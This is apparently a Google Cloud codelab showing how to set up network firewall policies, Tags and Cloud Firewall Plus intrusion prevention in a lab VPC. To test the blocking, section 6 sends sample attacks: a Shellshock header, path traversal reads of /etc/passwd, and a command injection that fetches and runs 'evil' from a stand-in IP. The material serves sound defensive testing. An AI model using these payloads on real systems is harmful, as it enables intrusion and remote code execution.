1. Introduction
Network firewall policies
Network firewall policy acts as a container for firewall rules. Rules defined in a network firewall policy are not enforced anywhere until the policy is associated with a VPC network. Each VPC network can have one network firewall policy associated with it. Network firewall policies support IAM-governed Tags (or just Tags) in firewall rules, which replace current network tags and can be used to provide identity to workload.
Sharing a network firewall policy across networks and the integration with IAM-governed Tags greatly simplifies the configuration and management of firewalls.
With the introduction of network firewall policy, Google Cloud's firewall policies now consists of the following components:
- Hierarchical Firewall Policy
- VPC Firewall Rules
- Network Firewall Policy ( Global and Regional)
Hierarchical firewall policies are supported at the organization and folder nodes within the resource hierarchy, whereas VPC firewall rules and network firewall policies get applied at the VPC level. A big difference between VPC firewall rules and network firewall policies is that VPC firewall rules can be applied only to a single VPC network, whereas network firewall policies can get attached to a single VPC or group of VPCs, amongst other benefits like batch updates.
Finally, we also have the implied firewall rules that come with every VPC network:
- An egress rule whose action is allow, destination is 0.0.0.0/0
- An ingress rule whose action is deny, source is 0.0.0.0/0
By default, the enforcement sequence is shown in the following diagram:
Please note that the enforcement order between the VPC firewall rules and the global network firewall policy can be swapped. Customers can specify the enforcement order at any time with a gcloud command.
Tags
The new Tags integrated in network firewall policy rules are key-value pair resources defined at the organization or project-level of the Google Cloud resource hierarchy. Such a Tag contains an IAM access control, as the name implies, that specifies who can do what on the tag. IAM permissions, for instance, allow one to specify which principals can assign values to tags and which principals can attach tags to resources. Once a Tag has been applied to a resource, network firewall rules can use it to allow and deny traffic.
Tags adhere to Google Cloud's inheritance resource model, meaning tags and their values are passed down across the hierarchy from their parents. As a result, tags may be created in one place and then used by other folders and projects throughout the resource hierarchy. Visit this page for details on tags and access restriction.
Tags should not be confused with network tags. The latter are strings that can be added to Compute Engine instances; they are associated with the instance and vanish when the instance is decommissioned. VPC firewall rules may include network tags, but since they are not regarded as cloud resources, they are not subject to IAM access control.
Note that Tags and IAM-governed Tags are being used interchangeably in this document.
Cloud Firewall Plus - Intrusion Prevention Service [Preview]
Cloud Firewall Plus adds Intrusion Prevention Service (IPS), a Layer 7 capability, to the distributed Google Cloud Firewall fabric.
You can now deploy reliable Layer 7 Next Generation Firewall (NGFW) inspections with granular controls, without making any changes to your network architecture or routing configurations.
To activate and deploy Layer 7 firewall control with IPS, you need to perform the following tasks:
- Create Google Cloud managed zonal firewall endpoints.
- Associate these endpoints with the Virtual Private Cloud (VPC) networks where you need the Cloud Firewall Plus service.
- Adjust your existing firewall policies and firewall rules to specify the threat prevention profiles for the various traffic paths.
Cloud Firewall Plus - Intrusion Prevention Service is currently available in Preview at the time of writing.
What you'll build
This codelab requires a single project and ability to create a VPC network with public connectivity, and will demonstrate how Cloud Firewall Plus can provide IPS functionality by:
- Inspecting intra-VPC/subnet flows [East-West]
- Inspecting ingress flows from the Internet [North-South]
The flows to be inspected will be selected using Cloud Firewall matching parameters including 5-tuple (source IP, destination IP, protocol, source port, destination port) and Tags. TLS Inspection is not included in this codelab.
The network firewall policy rulebase will be similar to the table below:
Priority | Direction | Target | Source | Destination | Action | Type | |
100 | Egress | Quarantine_Tag | Any | Any | Deny | Essentials | |
1000 | Ingress | Server_Tag | Health-Check Ranges | Any | Allow | ||
2000 | Ingress | Any | Identity-Aware Proxy Ranges | Any | Allow | ||
3000 | Ingress | Any | Geo, GCTI | Any | Deny | Standard | |
4000 | Egress | Any | Any | Geo, GCTI | Deny | ||
5000 | Egress | Any | Any | System update FQDNs | Allow | ||
6000 | Ingress | Server_Tag | 10.0.0.0/24 | Any | IPS | Plus | |
7000 | Ingress | Server_Tag | CloudNAT_IP | Any | IPS |
What you'll learn
- How to create a global network firewall policy
- How to create and use Tags with network firewall policy
- How to configure and use Cloud Firewall Plus Intrusion Prevention Service [Preview]
What you'll need
- Google Cloud project
- Knowledge of deploying instances and configuring networking components
- VPC firewall configuration knowledge
2. Before you begin
Create/update variables
This codelab makes use of $variables to aid gcloud configuration implementation in Cloud Shell.
In Cloud Shell, run the commands below replacing the information within brackets as required (skip setting the project if the desired one is already set). A different variable is used for organization-level resources if multiple e.g. firewall endpoints are needed.
gcloud config set project [project-id] export project_id=$(gcloud config list --format="value(core.project)") export org_id=$(gcloud projects get-ancestors $project_id --format="csv[no-heading](id,type)" | grep ",organization$" | cut -d"," -f1 ) export region=[region] export zone=[zone] export prefix=fwplus export org_prefix=fwplus
3. Cloud Firewall Plus Security Profile and Endpoint Creation
Since the Cloud Firewall Plus Endpoint creation takes about 20 minutes, it will be created first and the base setup can be done in parallel while the endpoint is being created.
Create the Security Profile and Security Profile Group:
gcloud beta network-security security-profiles threat-prevention \ create $org_prefix-sp-threat \ --organization $org_id \ --location=global gcloud beta network-security security-profile-groups create \ $org_prefix-spg \ --organization $org_id \ --location=global \ --threat-prevention-profile organizations/$org_id/locations/global/securityProfiles/$org_prefix-sp-threat
Expected output:
Waiting for security-profile [organizations/$org_id/locations/global/securityProfiles/$org_prefix-sp-threat] to be created...done. Waiting for operation [organizations/$org_id/locations/global/operations/operation-1687458013374-5febbef75e993-ea522924-c963d150] to com plete...done. Created security profile group [$org_prefix-spg].
Confirm that the resources were successfully created:
gcloud beta network-security security-profiles threat-prevention \ list --location=global --organization $org_id gcloud beta network-security security-profile-groups list \ --organization $org_id --location=global
Create the Cloud Firewall Plus endpoint:
gcloud beta network-security firewall-endpoints create $org_prefix-$zone \ --zone=$zone --organization $org_id
Run the command below to confirm that the endpoint is being created (STATE: CREATING).
gcloud beta network-security firewall-endpoints list --zone $zone \ --organization $org_id
Expected output (note that the output format may vary according to the client being used):
ID LOCATION STATE fwplus-[zone] [zone] CREATING
Optionally, run the command below to get more details:
gcloud beta network-security firewall-endpoints describe \ $org_prefix-$zone --organization $org_id --zone $zone
Expected output:
createTime: '2023-04-25T18:08:45.493499362Z' name: organizations/[org-id]/locations/[zone]/firewallEndpoints/fwplus-[zone] state: CREATING updateTime: '2023-04-25T18:08:45.493499362Z'
The endpoint creation process takes about 20 minutes. Proceed to the Base Setup section to create the required resources in parallel.
4. Base Setup
Proceed to the following sections if you prefer to manually create the base resources.
VPC network and subnet
VPC Network and subnet
Create the VPC network and subnet:
gcloud compute networks create $prefix-vpc --subnet-mode=custom gcloud compute networks subnets create $prefix-$region-subnet \ --range=10.0.0.0/24 --network=$prefix-vpc --region=$region
Cloud NAT
Create the Cloud Routers and Cloud NAT gateways:
gcloud compute addresses create $prefix-$region-cloudnatip --region=$region export cloudnatip=$(gcloud compute addresses list --filter=name:$prefix-$region-cloudnatip --format="value(address)") gcloud compute routers create $prefix-cr \ --region=$region --network=$prefix-vpc gcloud compute routers nats create $prefix-cloudnat-$region \ --router=$prefix-cr --router-region $region \ --nat-all-subnet-ip-ranges \ --nat-external-ip-pool=$prefix-$region-cloudnatip
Instances
Create the client and web-server instances:
gcloud compute instances create $prefix-$zone-www \ --subnet=$prefix-$region-subnet --no-address --zone $zone \ --metadata startup-script='#! /bin/bash apt-get update apt-get install apache2 tcpdump iperf3 -y a2ensite default-ssl a2enmod ssl # Read VM network configuration: md_vm="http://169.254.169.254/computeMetadata/v1/instance/" vm_hostname="$(curl $md_vm/name -H "Metadata-Flavor:Google" )" filter="{print \$NF}" vm_network="$(curl $md_vm/network-interfaces/0/network \ -H "Metadata-Flavor:Google" | awk -F/ "${filter}")" vm_zone="$(curl $md_vm/zone \ -H "Metadata-Flavor:Google" | awk -F/ "${filter}")" # Apache configuration: echo "Page on $vm_hostname in network $vm_network zone $vm_zone" | \ tee /var/www/html/index.html systemctl restart apache2' gcloud compute instances create $prefix-$zone-client \ --subnet=$prefix-$region-subnet --no-address --zone $zone \ --scopes=compute-ro \ --metadata startup-script='#! /bin/bash apt-get update apt-get install apache2-utils iperf3 tcpdump -y'
P roject-level Tags
Assign tagAdmin permission to the user if needed:
export user_id=$(gcloud auth list --format="value(account)") gcloud projects add-iam-policy-binding $project_id --member user:$user_id --role roles/resourcemanager.tagAdmin
Create the project-level Tag key and values:
gcloud resource-manager tags keys create $prefix-vpc-tags \ --parent projects/$project_id \ --purpose GCE_FIREWALL \ --purpose-data network=$project_id/$prefix-vpc gcloud resource-manager tags values create $prefix-vpc-client \ --parent=$project_id/$prefix-vpc-tags gcloud resource-manager tags values create $prefix-vpc-server \ --parent=$project_id/$prefix-vpc-tags gcloud resource-manager tags values create $prefix-vpc-quarantine \ --parent=$project_id/$prefix-vpc-tags
Bind tags to instances:
gcloud resource-manager tags bindings create \ --location $zone \ --tag-value $project_id/$prefix-vpc-tags/$prefix-vpc-server \ --parent //compute.googleapis.com/projects/$project_id/zones/$zone/instances/$prefix-$zone-www gcloud resource-manager tags bindings create \ --location $zone \ --tag-value $project_id/$prefix-vpc-tags/$prefix-vpc-client \ --parent //compute.googleapis.com/projects/$project_id/zones/$zone/instances/$prefix-$zone-client
Global network firewall policy
Create global network firewall policy:
gcloud compute network-firewall-policies create \ $prefix-fwpolicy --description \ "Cloud Firewall Plus" --global
Create Cloud Firewall Essential rules to deny traffic from quarantined instances (created as example only, not being used in this codelab) and allow traffic from health-check and identity-aware proxy ranges:
gcloud compute network-firewall-policies rules create 100 \ --description="block quarantined workloads" \ --action=deny \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=all \ --direction=EGRESS \ --target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-quarantine \ --dest-ip-ranges=0.0.0.0/0 gcloud compute network-firewall-policies rules create 1000 \ --description="allow http traffic from health-checks ranges" \ --action=allow \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=tcp:80,tcp:443 \ --direction=INGRESS \ --target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server \ --src-ip-ranges=35.191.0.0/16,130.211.0.0/22,209.85.152.0/22,209.85.204.0/22 gcloud compute network-firewall-policies rules create 2000 \ --description="allow ssh traffic from identity-aware-proxy ranges" \ --action=allow \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=tcp:22 \ --direction=INGRESS \ --src-ip-ranges=35.235.240.0/20
Create Cloud Firewall Standard rules to deny ingress and egress traffic from/to embargoed countries, known malicious IPs and ToR exit nodes; and only allow egress traffic to specific FQDNs for system updates (created as example only, not being used in this codelab):
gcloud compute network-firewall-policies rules create 3000 \ --description="block ingress traffic from embargoed countries, known malicious IPs and ToR exit nodes" \ --action=deny \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=all \ --direction=INGRESS \ --src-region-codes CU,IR,KP,SY \ --src-threat-intelligence iplist-tor-exit-nodes,iplist-known-malicious-ips gcloud compute network-firewall-policies rules create 4000 \ --description="block ingress traffic from embargoed countries, known malicious IPs and ToR exit nodes" \ --action=deny \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=all \ --direction=EGRESS \ --dest-region-codes CU,IR,KP,SY \ --dest-threat-intelligence iplist-tor-exit-nodes,iplist-known-malicious-ips gcloud compute network-firewall-policies rules create 5000 \ --description "allow system updates" \ --action=allow \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=tcp:80,tcp:443 \ --direction=EGRESS \ --dest-fqdns=ftp.us.debian.org,debian.map.fastly.net,packages.cloud.google.com,www3.l.google.com
Create Cloud Firewall rules to allow ingress east-west / intra-subnet and north-south / internet traffic from the specific ranges (these rules will be updated to enable Cloud Firewall Plus):
gcloud compute network-firewall-policies rules create 6000 \ --description "allow ingress internal traffic from clients" \ --action=allow \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --direction=INGRESS \ --enable-logging \ --layer4-configs all \ --src-ip-ranges=10.0.0.0/24 \ --target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server gcloud compute network-firewall-policies rules create 7000 \ --description "allow ingress external traffic to server" \ --action=allow \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=tcp:80,tcp:443 \ --direction=INGRESS \ --enable-logging \ --src-ip-ranges=$cloudnatip \ --target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-server
Associate the network firewall policy to the VPC network:
gcloud compute network-firewall-policies associations create \ --firewall-policy $prefix-fwpolicy \ --network $prefix-vpc \ --name $prefix-fwpolicy-association \ --global-firewall-policy
External TCP/UDP Network Load Balancer
Reserve an external IP address and create the instance group and health-check:
gcloud compute addresses create $prefix-$region-nlbip --region=$region gcloud compute instance-groups unmanaged create $prefix-ig \ --zone $zone gcloud compute instance-groups unmanaged add-instances $prefix-ig \ --instances $prefix-$zone-www --zone $zone gcloud compute health-checks create http $prefix-$region-hc-http80 \ --region $region --port 80
Create backend service and forwarding rule:
gcloud compute backend-services create $prefix-nlb-bes \ --protocol TCP \ --health-checks $prefix-$region-hc-http80 \ --health-checks-region $region \ --region $region gcloud compute backend-services add-backend $prefix-nlb-bes \ --instance-group $prefix-ig \ --instance-group-zone $zone \ --region $region gcloud compute forwarding-rules create $prefix-nlb-ipv4 \ --load-balancing-scheme EXTERNAL \ --region $region \ --ports 80 \ --address $prefix-$region-nlbip \ --backend-service $prefix-nlb-bes
5. Cloud Firewall Plus Endpoint Association
Define the environment variables if needed.
Confirm that the Cloud Firewall Endpoint Plus creation was successfully completed. Only proceed once the state is shown as ACTIVE (during the creation the expected state is CREATING):
gcloud beta network-security firewall-endpoints list --zone $zone \ --organization $org_id
Expected output (note that the output format may vary according to the client being used):
ID LOCATION STATE Fwplus-[zone] [zone] ACTIVE
Optionally, run the command below to get more details:
gcloud beta network-security firewall-endpoints describe \ $org_prefix-$zone --organization $org_id --zone $zone
Expected output:
createTime: '2023-04-25T18:08:45.493499362Z' name: organizations/[org-id]/locations/[zone]/firewallEndpoints/fwplus-[zone] state: ACTIVE updateTime: '2023-04-25T18:29:40.840608100Z'
Associate the Cloud Firewall Plus endpoint to the VPC network:
gcloud beta network-security firewall-endpoint-associations create \ $prefix-association --zone $zone \ --network=$prefix-vpc --endpoint $org_prefix-$zone \ --organization $org_id
The association process takes about 10 minutes. Only proceed once the state is shown as ACTIVE (the expected state is CREATING during the creation process):
gcloud beta network-security firewall-endpoint-associations list
Expected output:
ID LOCATION NETWORK ENDPOINT STATE fwplus-association [zone] fwplus-vpc fwplus-[zone] ACTIVE
Optionally, run the command below to get more details:
gcloud beta network-security firewall-endpoint-associations \ describe $prefix-association --zone $zone
Expected output:
createTime: '2023-05-01T22:25:06.218544436Z' firewallEndpoint: organizations/[org-id]/locations/[zone]/firewallEndpoints/fwplus-[zone] name: projects/[project-id]/locations/[zone]/firewallEndpointAssociations/fwplus-association network: projects/[project-id]/global/networks/fwplus-vpc state: ACTIVE updateTime: '2023-05-01T22:33:06.467596536Z'
6. Cloud Firewall Plus Inspection Rules
Open a new tab and initiate an SSH connection to the client VM through IAP (you will need to define the variables again in the new tab):
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
Define the require variables in the SSH session and set the variables (make sure that the values are correct):
export region=[region] export zone=[zone] export prefix=fwplus export target_privateip=$(gcloud compute instances list --filter=name:$prefix-$zone-www --format="value(networkInterfaces.networkIP)") export target_nlbip=$(gcloud compute addresses list --filter=name:$prefix-$region-nlbip --format="value(address)")
curl both IPs to confirm they are reachable:
curl $target_privateip --max-time 2 curl $target_nlbip --max-time 2
Expected result for both curl requests:
Page on fwplus-[zone]-www in network fwplus-vpc zone [zone]
Send sample attacks to the internal server IP (East-West / intra-VPC traffic). The web server should respond to all requests, confirming that there is no L7 inspection/prevention in place:
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://$target_privateip/cgi-bin/test-critical -m 3 curl http://$target_privateip/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 3 curl http://$target_privateip/?item=../../../../WINNT/win.ini -m 3 curl "http://$target_privateip/weblogin.cgi?username=admin' -m 3;cd /tmp;wget http://123.123.123.123/evil --tries 2 -T 3;sh evil;rm evil"
Resend the sample attacks to the external server IP through Cloud NAT (North-South inbound traffic), and similarly the web server should respond to all requests:
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://$target_nlbip/cgi-bin/test-critical -m 3 curl http://$target_nlbip/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 3 curl http://$target_nlbip/?item=../../../../WINNT/win.ini -m 3 curl "http://$target_nlbip/weblogin.cgi?username=admin' -m 3;cd /tmp;wget http://123.123.123.123/evil --tries 2 -T 3;sh evil;rm evil"
Expected results for both public and private IPs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.56 (Debian) Server at [IP] Port 80</address> </body></html> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.56 (Debian) Server at [IP] Port 80</address> </body></html> Page on fwplus-[zone]-www in network fwplus-vpc zone [zone] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.<br /> </p> <hr> <address>Apache/2.4.56 (Debian) Server at fwplus-[zone]-www.c.[project-id].internal Port 80</address> </body></html>
Switch back to Cloud Shell and update the existing ingress rules to enable L7 inspection:
gcloud beta compute network-firewall-policies rules update 6000 \ --action=apply_security_profile_group \ --firewall-policy=$prefix-fwpolicy \ --enable-logging \ --global-firewall-policy \ --security-profile-group=//networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$org_prefix-spg gcloud beta compute network-firewall-policies rules update 7000 \ --action=apply_security_profile_group \ --firewall-policy=$prefix-fwpolicy \ --enable-logging \ --global-firewall-policy \ --security-profile-group=//networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$org_prefix-spg
Optionally, describe the firewall rules to verify that both were successfully updated:
gcloud beta compute network-firewall-policies rules describe 6000 \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy
Expected output:
--- action: apply_security_profile_group description: allow ingress internal traffic from tagged clients direction: INGRESS disabled: false enableLogging: true kind: compute#firewallPolicyRule match: layer4Configs: - ipProtocol: all srcIpRanges: - 10.0.0.0/24 priority: 800 ruleTupleCount: 4 securityProfileGroup: //networksecurity.googleapis.com/organizations/[org-id]/locations/global/securityProfileGroups/fwplus-spg targetSecureTags: - name: tagValues/281484362719839 state: EFFECTIVE
Rule 7000:
gcloud beta compute network-firewall-policies rules describe 7000 \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy
Expected output:
--- action: apply_security_profile_group description: allow ingress external traffic to server direction: INGRESS disabled: false enableLogging: true kind: compute#firewallPolicyRule match: layer4Configs: - ipProtocol: tcp ports: - '80' - ipProtocol: tcp ports: - '443' srcIpRanges: - [cloudnat-ip] priority: 900 ruleTupleCount: 6 securityProfileGroup: //networksecurity.googleapis.com/organizations/[org-id]/locations/global/securityProfileGroups/fwplus-spg targetSecureTags: - name: tagValues/281484362719839 state: EFFECTIVE
Switch back to the client VM and re-send the sample attacks to the internal server IP (East-West / Intra-VPC inspection):
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://$target_privateip/cgi-bin/test-critical -m 3 curl http://$target_privateip/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 3 curl http://$target_privateip/?item=../../../../WINNT/win.ini -m 3 curl "http://$target_privateip/weblogin.cgi?username=admin' -m 3;cd /tmp;wget http://123.123.123.123/evil --tries 2 -T 3;sh evil;rm evil"
Resend the sample attacks to the external server IP through Cloud NAT (North-South inbound inspection):
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://$target_nlbip/cgi-bin/test-critical -m 3 curl http://$target_nlbip/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 3 curl http://$target_nlbip/?item=../../../../WINNT/win.ini -m 3 curl "http://$target_nlbip/weblogin.cgi?username=admin' -m 3;cd /tmp;wget http://123.123.123.123/evil --tries 2 -T 3;sh evil;rm evil"
No responses are received for the first attacks as per the expected output below, confirming that the high severity attacks are now being blocked.
curl: (56) Recv failure: Connection reset by peer curl: (28) Operation timed out after 3000 milliseconds with 0 bytes received curl: (28) Operation timed out after 3000 milliseconds with 0 bytes received <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.<br /> </p> <hr> <address>Apache/2.4.56 (Debian) Server at fwplus-[zone]-www.c.[project-id].internal Port 80</address> </body></html>
Navigate to Network Security > Threats on the Cloud Console to verify the logs (you may need to refresh a few times if the attacks are not yet displayed).
Choose one of the attacks and click on "View audit log" on the right side (open in a new tab to easily switch back). Expand the attack to show the details:
Optionally, replace the Log Explorer filter with the query below:
resource.type="networksecurity.googleapis.com/FirewallEndpoint"
Threat log entries should be seen as per below:
Cloud Firewall intercepted packets can be verified using the Log Explorer filter below (helpful for troubleshooting purposes):
jsonPayload.rule_details.action="APPLY_SECURITY_PROFILE_GROUP"
Continue to Internet traffic inspection (optional) or close the SSH session and proceed to the next chapter for the clean-up steps.
[Optional] Internet traffic inspection
As verified in the previous section, the inspected flows so far are intra-subnet/VPC (East-West) and incoming traffic from the Internet (North-South inbound). Cloud Firewall Plus can also be configured to inspect all internet traffic (North-South outbound) by creating a new egress rule using Cloud Shell:
gcloud beta compute network-firewall-policies rules create 10000 \ --description "inspect all egress internet traffic from clients" \ --action=apply_security_profile_group \ --firewall-policy=$prefix-fwpolicy \ --global-firewall-policy \ --layer4-configs=tcp:80,tcp:443 \ --direction=EGRESS \ --dest-ip-ranges=0.0.0.0/0 \ --enable-logging \ --target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-client \ --security-profile-group=//networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$org_prefix-spg
Switch back to the client VM and resend high severity attacks to the external server IP:
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://$target_nlbip/cgi-bin/test-critical -m 3 curl http://$target_nlbip/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 3
Expected output:
curl: (56) Recv failure: Connection reset by peer curl: (28) Operation timed out after 3001 milliseconds with 0 bytes received
Switch to the open Threats tab on the Cloud Console to verify the logs (you may need to refresh a few times). The attacks should have been identified and logged again, but now the source IP is internal because an egress rule is being triggered first:
Close the SSH session and proceed to the next section for the clean-up steps.
7. Clean-Up steps
Cloud Firewall Plus SPG and Association Clean-Up
List existing Cloud Firewall Plus associations:
gcloud beta network-security firewall-endpoint-associations list
Delete the Cloud Firewall Plus association:
gcloud beta network-security firewall-endpoint-associations delete \ $prefix-association --zone $zone
gcloud beta network-security firewall-endpoint-associations list
List existing Cloud Firewall Plus endpoints:
gcloud beta network-security firewall-endpoints list --zone $zone \ --organization $org_id
Delete the Cloud Firewall Plus endpoint, which can take about 20 minutes:
gcloud -q beta network-security firewall-endpoints delete \ $org_prefix-$zone --zone=$zone --organization $org_id
Confirm that the Cloud Firewall Plus was deleted by running the command below:
gcloud beta network-security firewall-endpoints list --zone $zone \ --organization $org_id
Remove the Cloud Firewall Network Policy and association:
gcloud -q compute network-firewall-policies associations delete \ --firewall-policy $prefix-fwpolicy \ --name $prefix-fwpolicy-association \ --global-firewall-policy gcloud -q compute network-firewall-policies delete $prefix-fwpolicy --global
Delete the Security Profile Group and Threat Prevention Profile:
gcloud -q beta network-security security-profile-groups delete \ $org_prefix-spg \ --organization $org_id \ --location=global gcloud -q beta network-security security-profiles threat-prevention \ delete $org_prefix-sp-threat \ --organization $org_id \ --location=global
Base Setup Clean-Up
Proceed to the next step if you prefer to delete the base resources.
Define the environment variables if needed. From Cloud Shell, delete Network Load Balancer components:
gcloud -q compute forwarding-rules delete $prefix-nlb-ipv4 --region $region gcloud -q compute backend-services delete $prefix-nlb-bes --region $region gcloud -q compute health-checks delete $prefix-$region-hc-http80 --region $region gcloud -q compute instance-groups unmanaged delete $prefix-ig --zone $zone
Remove instances:
gcloud -q compute instances delete $prefix-$zone-www --zone=$zone gcloud -q compute instances delete $prefix-$zone-client --zone=$zone
Optionally, perform the steps below if tagAdmin and tagUsers roles were changed:
export user_id=$(gcloud auth list --format="value(account)") gcloud organizations remove-iam-policy-binding $org_id \ --member user:$user_id --role roles/resourcemanager.tagAdmin gcloud organizations remove-iam-policy-binding $org_id \ --member user:$user_id --role roles/resourcemanager.tagUser
Remove Tag key and values:
gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-client gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-server gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-quarantine gcloud -q resource-manager tags keys delete $project_id/$prefix-vpc-tags
Delete Cloud Router and Cloud NAT:
gcloud -q compute routers nats delete $prefix-cloudnat-$region \ --router=$prefix-cr --router-region $region gcloud -q compute routers delete $prefix-cr --region=$region
Delete reserved IP addresses:
gcloud -q compute addresses delete $prefix-$region-nlbip --region=$region gcloud -q compute addresses delete $prefix-$region-cloudnatip --region=$region
Finally, delete subnet and VPC network:
gcloud -q compute networks subnets delete $prefix-$region-subnet --region $region gcloud -q compute networks delete $prefix-vpc
8. Congratulations!
Congratulations, you've successfully completed the Cloud Firewall Plus for East-West and North-South Inspection codelab.